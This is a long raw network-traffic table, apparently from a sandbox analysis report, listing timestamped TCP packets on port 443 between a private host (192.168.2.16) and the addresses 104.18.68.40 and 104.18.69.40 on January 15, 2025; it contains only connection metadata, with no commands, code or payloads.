                                                                                                                                            Jan 15, 2025 19:14:39.344521046 CET44349856104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.344816923 CET49869443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.344850063 CET44349869104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.344945908 CET49869443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.345196962 CET49869443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.345213890 CET44349869104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.365186930 CET44349858104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.365360975 CET44349858104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.365425110 CET49858443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.365943909 CET49858443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.365962982 CET44349858104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.366281986 CET49870443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.366328955 CET44349870104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.366451025 CET49870443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.366748095 CET49870443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.366760015 CET44349870104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.405958891 CET44349859104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.406061888 CET44349859104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.406111956 CET49859443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.406673908 CET49859443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.406691074 CET44349859104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.406982899 CET49871443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.407033920 CET44349871104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.407322884 CET49871443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.407502890 CET49871443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.407524109 CET44349871104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.410094976 CET44349860104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.410391092 CET49860443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.410406113 CET44349860104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.410877943 CET44349860104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.411258936 CET49860443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.411366940 CET44349860104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.411487103 CET49860443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.455353022 CET44349860104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.486540079 CET44349861104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.486819029 CET49861443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.486860037 CET44349861104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.487982035 CET44349861104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.488293886 CET49861443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.488435030 CET49861443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.488450050 CET44349861104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.488516092 CET44349861104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.538332939 CET49861443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.556791067 CET44349862104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.557159901 CET49862443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.557244062 CET44349862104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.558361053 CET44349862104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.558660984 CET49862443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.558775902 CET49862443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.558788061 CET44349862104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.558849096 CET44349862104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.571691990 CET44349860104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.571760893 CET44349860104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.571824074 CET49860443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.571846008 CET44349860104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.571858883 CET44349860104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.571921110 CET49860443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.572766066 CET49872443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.572803974 CET49860443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.572818995 CET44349860104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.572855949 CET44349872104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.572941065 CET49872443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.573188066 CET49872443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.573220968 CET44349872104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.580032110 CET44349863104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.580257893 CET49863443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.580276966 CET44349863104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.581379890 CET44349863104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.581681013 CET49863443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.581792116 CET49863443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.581804037 CET44349863104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.581857920 CET44349863104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.591433048 CET44349864104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.591629028 CET49864443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.591636896 CET44349864104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.592691898 CET44349864104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.592781067 CET49864443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.593095064 CET49864443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.593141079 CET44349864104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.593166113 CET49864443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.602332115 CET49862443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.634346008 CET49864443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.634349108 CET49863443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.634351969 CET44349864104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.644901037 CET44349861104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.645124912 CET44349861104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.645190954 CET49861443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.645587921 CET49861443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.645615101 CET44349861104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.682323933 CET49864443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.700870037 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.701128006 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.701174021 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.702272892 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.702627897 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.702732086 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.702811956 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.726830006 CET44349862104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.726964951 CET44349862104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.727035999 CET49862443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.727051020 CET44349862104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.727082968 CET44349862104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.727224112 CET49862443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.727257967 CET44349862104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.727341890 CET44349862104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.727435112 CET49862443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.727485895 CET49862443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.727516890 CET44349862104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.733334064 CET44349866104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.733561039 CET49866443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.733582020 CET44349866104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.734123945 CET44349866104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.734419107 CET49866443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.734507084 CET44349866104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.734527111 CET49866443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.735380888 CET44349864104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.735428095 CET44349864104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.735507011 CET44349864104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.735578060 CET49864443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.735862970 CET44349863104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.735999107 CET49864443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.736010075 CET44349864104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.736114979 CET44349863104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.736202002 CET49863443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.737552881 CET49863443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.737581015 CET44349863104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.746344090 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.775353909 CET44349866104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.777348995 CET49866443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.812249899 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.812254906 CET44349868104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.812500000 CET49867443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.812552929 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.812614918 CET49868443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.812688112 CET44349868104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.812905073 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.813047886 CET44349868104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.813229084 CET49867443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.813312054 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.813503981 CET49868443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.813580036 CET44349868104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.813646078 CET49867443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.813699961 CET49868443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.814979076 CET44349869104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.815191031 CET49869443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.815254927 CET44349869104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.815607071 CET44349869104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.816179991 CET49869443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.816257954 CET44349869104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.816338062 CET49869443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.833036900 CET44349870104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.833250999 CET49870443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.833290100 CET44349870104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.836333990 CET44349870104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.836400032 CET49870443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.836688042 CET49870443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.836771011 CET44349870104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.836853981 CET49870443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.836863041 CET44349870104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.855366945 CET44349868104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.855387926 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.859405041 CET44349869104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.868767977 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.868897915 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.868984938 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.869069099 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.869119883 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.869157076 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.869206905 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.869218111 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.869259119 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.869266987 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.869370937 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.869436979 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.869451046 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.869548082 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.870399952 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.870412111 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.881340981 CET49870443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.901565075 CET44349871104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.901844025 CET49871443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.901909113 CET44349871104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.902920961 CET44349871104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.902992010 CET49871443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.903254032 CET49871443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.903359890 CET49871443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.903373957 CET44349871104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.903445959 CET44349871104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.918346882 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.918380976 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.929395914 CET44349866104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.929702997 CET44349866104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.929980040 CET49866443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.930177927 CET49866443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.930218935 CET44349866104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.930478096 CET49873443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.930531979 CET44349873104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.930596113 CET49873443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.931035995 CET49873443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.931073904 CET44349873104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.937016010 CET44349868104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.937074900 CET44349868104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.937128067 CET49868443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.937397957 CET49868443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.937437057 CET44349868104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.938527107 CET49874443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.938566923 CET44349874104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.938659906 CET49874443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.938828945 CET49874443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.938842058 CET44349874104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.949352980 CET49871443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.949413061 CET44349871104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.957487106 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.957568884 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.957598925 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.957739115 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.957827091 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.957889080 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.957904100 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.957998991 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.958054066 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.958067894 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.958117008 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.958128929 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.958233118 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.958317995 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.958368063 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.958383083 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.958581924 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.958924055 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.959109068 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.959197998 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.959255934 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.959270000 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.959333897 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.959346056 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.959557056 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.959640980 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.959666014 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.959680080 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.959748030 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.959760904 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.959841013 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.959938049 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.959949970 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.960216045 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.960268021 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.960299969 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.960319042 CET49867443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.960333109 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.960376978 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.960429907 CET49867443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.960436106 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.960448027 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.960483074 CET49867443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.960493088 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.960922003 CET49867443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.960928917 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.960967064 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.961004019 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.961047888 CET49867443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.961056948 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.961101055 CET49867443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:39.965116024 CET44349867104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.985224962 CET44349869104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.985459089 CET44349869104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.985538006 CET49869443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.985857010 CET49869443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.985898018 CET44349869104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.986123085 CET49875443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.986167908 CET44349875104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.986228943 CET49875443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.986674070 CET49875443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:39.986696959 CET44349875104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:39.997327089 CET49871443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.000612974 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.000719070 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.000730038 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.000761986 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.000967026 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.013354063 CET49867443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:40.015266895 CET44349870104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.015465021 CET44349870104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.015615940 CET44349870104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.015674114 CET49870443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.016031981 CET49870443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.016052008 CET44349870104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.016315937 CET49876443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.016400099 CET44349876104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.016479015 CET49876443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.016665936 CET49876443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.016689062 CET44349876104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.040586948 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.040755987 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.040843010 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.040862083 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.040894032 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.040942907 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.040954113 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.041194916 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.041263103 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.041276932 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.041337013 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.043515921 CET44349865104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.043598890 CET49865443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:40.043612003 CET44349865104.18.68.40192.168.2.16
